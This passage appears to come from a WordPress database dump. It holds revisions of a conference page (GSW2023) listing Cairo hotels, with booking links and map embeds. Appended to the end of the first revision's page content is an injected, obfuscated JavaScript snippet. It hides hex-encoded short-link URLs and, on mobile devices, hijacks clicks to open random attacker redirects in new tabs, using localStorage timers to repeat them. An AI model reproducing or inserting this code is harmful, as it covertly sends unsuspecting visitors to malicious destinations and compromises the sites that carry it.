href=\"https://www.ihg.com/intercontinental/hotels/us/en/cairo/croha/hoteldetail?fromRedirect=true&amp;qSrt=sAV&amp;qIta=99801505&amp;icdv=99801505&amp;qSlH=CROHA&amp;qGrpCd=DY8&amp;setPMCookies=true&amp;qSHBrC=IC&amp;qDest=Corniche+El+Nil%252C+Cairo%252C+EG&amp;srb_u=1\" target=\"_blank\" rel=\"noopener\">BOOK NOW</a></span></h5>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\n<p>[/vc_column_text][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"4788\" primary_title=\"Grand Nile Tower Hotel\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Grand Nile Tower Hotel\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.grandniletower.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fgrand-nile-tower-hotel%2F|title:Grand%20Nile%20Tower%20Hotel\"]</p>\n<ul>\n<li>https://www.grandniletower.com/</li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h5></h5>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2690\" primary_title=\"Novotel Cairo El Borg\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Novotel Cairo El Borg\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fnovotelborg.com-cairo.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fnovotel-cairo-el-borg%2F\"]</p>\n<ul>\n<li><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<ul>\n<li>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5>Deadline for the Special Rates is August 15, 2023</h5>\n</li>\n</ul>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2689\" primary_title=\"Kempinski Nile Hotel Garden City Cairo\" primary_title_font_container=\"color:%230000ed\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Kempinski Nile Hotel Garden City Cairo\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:http%3A%2F%2F%3Cli%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%22%20target%3D%22_blank%22%20%3Ehttps%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%3C%2Fa%3E%3C%2Fli%3E|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][dt_banner image_id=\"2688\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Steigenberger Hotel El Tahrir</span></h2>\n<p><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></strong></span></p>\n<p style=\"text-align: right;\"><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">BOOK NOW  </a></strong></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">Steigenberger Hotel El Tahrir – GSW2023</a></strong></span></h4>\n<p>[/dt_banner][/vc_column][vc_column width=\"1/2\"][dt_banner image_id=\"2688\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Steigenberger Hotel El Tahrir</span></h2>\n<p><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></strong></span></p>\n<p style=\"text-align: right;\"><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">BOOK NOW  </a></strong></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">Steigenberger Hotel El Tahrir – GSW2023</a></strong></span></h4>\n<p>[/dt_banner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-07-18 22:45:17','2023-07-18 22:45:17','',2685,'https://gsw2023.com/?p=5020',0,'revision','',0),
(5021,1,'2023-07-18 23:02:34','2023-07-18 23:02:34','<p>[vc_row][vc_column][dt_banner image_id=\"2683\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">INTERCONTINENTAL CAIRO SEMIRAMIS</span></h2>\n<ul>\n<li style=\"text-align: left;\">\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\n</li>\n</ul>\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"></iframe></p>\n<h4><span style=\"color: #ffffff;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 14pt;\"><a style=\"color: #ffff00;\" href=\"https://www.ihg.com/intercontinental/hotels/us/en/cairo/croha/hoteldetail?fromRedirect=true&amp;qSrt=sAV&amp;qIta=99801505&amp;icdv=99801505&amp;qSlH=CROHA&amp;qGrpCd=DY8&amp;setPMCookies=true&amp;qSHBrC=IC&amp;qDest=Corniche+El+Nil%252C+Cairo%252C+EG&amp;srb_u=1\" target=\"_blank\" rel=\"noopener\">BOOK NOW</a></span></h5>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\n<p>[/vc_column_text][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"4788\" primary_title=\"Grand Nile Tower Hotel\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Grand Nile Tower Hotel\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.grandniletower.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fgrand-nile-tower-hotel%2F|title:Grand%20Nile%20Tower%20Hotel\"]</p>\n<ul>\n<li>https://www.grandniletower.com/</li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h5></h5>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2690\" primary_title=\"Novotel Cairo El Borg\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Novotel Cairo El Borg\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fnovotelborg.com-cairo.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fnovotel-cairo-el-borg%2F\"]</p>\n<ul>\n<li><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<ul>\n<li>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5>Deadline for the Special Rates is August 15, 2023</h5>\n</li>\n</ul>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2689\" primary_title=\"Kempinski Nile Hotel Garden City Cairo\" primary_title_font_container=\"color:%230000ed\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Kempinski Nile Hotel Garden City Cairo\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:http%3A%2F%2F%3Cli%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%22%20target%3D%22_blank%22%20%3Ehttps%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%3C%2Fa%3E%3C%2Fli%3E|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][dt_banner image_id=\"4788\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 class=\"vc_custom_heading\" style=\"text-align: center;\"><span style=\"color: #ffffff;\">Grand Nile Tower Hotel</span></h2>\n<ul>\n<li><span style=\"color: #ffffff;\"><a style=\"color: #ffffff;\" href=\"https://www.grandniletower.com/\">https://www.grandniletower.com/</a></span></li>\n</ul>\n<p><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3454.091887744032!2d31.22467591511475!3d30.03422158188607!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x14584090695d6421%3A0x201285387107863a!2sGrand%20Nile%20Tower!5e0!3m2!1sen!2ssa!4v1689721277379!5m2!1sen!2ssa\" width=\"200\" height=\"200\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p>\n<h5 style=\"text-align: center;\"><a href=\"https://gsw2023.com/index.php/grand-nile-tower-hotel/\"><span style=\"font-size: 14pt; color: #ffff00;\">BOOK NOW</span></a></h5>\n<p>[/dt_banner][dt_banner image_id=\"2688\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Steigenberger Hotel El Tahrir</span></h2>\n<p><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></strong></span></p>\n<p style=\"text-align: right;\"><iframe 